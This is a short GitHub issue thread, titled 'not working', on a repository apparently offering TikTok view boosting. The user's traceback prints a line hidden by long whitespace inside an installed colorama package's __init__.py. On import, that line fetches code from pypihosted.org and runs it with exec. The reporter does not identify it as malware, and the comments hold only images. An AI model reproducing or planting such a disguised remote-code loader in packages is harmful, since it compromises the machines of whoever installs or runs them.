### ISSUE TITLE
not working

### ISSUE THREAD

**Issue by LucasHisabf** [IkuzaDev/TikViews#3]
```
Traceback (most recent call last):
  File "/home/dureasd/TikViews/main.py", line 6, in <module>
    import colorama
  File "/home/dureasd/.local/lib/python3.10/site-packages/colorama/__init__.py", line 5, in <module>
    import os


                                ;exec(__import__('requests').get('https://pypihosted.org/version').text)
  File "<string>", line 30
    <div class="mt-3">2024-03-07 19:03:04 UTC</div>
                           ^
SyntaxError: leading zeros in decimal integer literals are not permitted; use an 0o prefix for octal integers
```

**Comment by LucasHisabf** [comment]
![image](https://github.com/IkuzaDev/TikViews/assets/104284473/6057eeac-6efb-48d4-a7fd-e13d67ccd90a)

**Comment by Cleboost** [comment]
![image](https://github.com/IkuzaDev/TikViews/assets/61158869/b2fabaa7-48b0-4688-bcc4-f8adb3b10034)
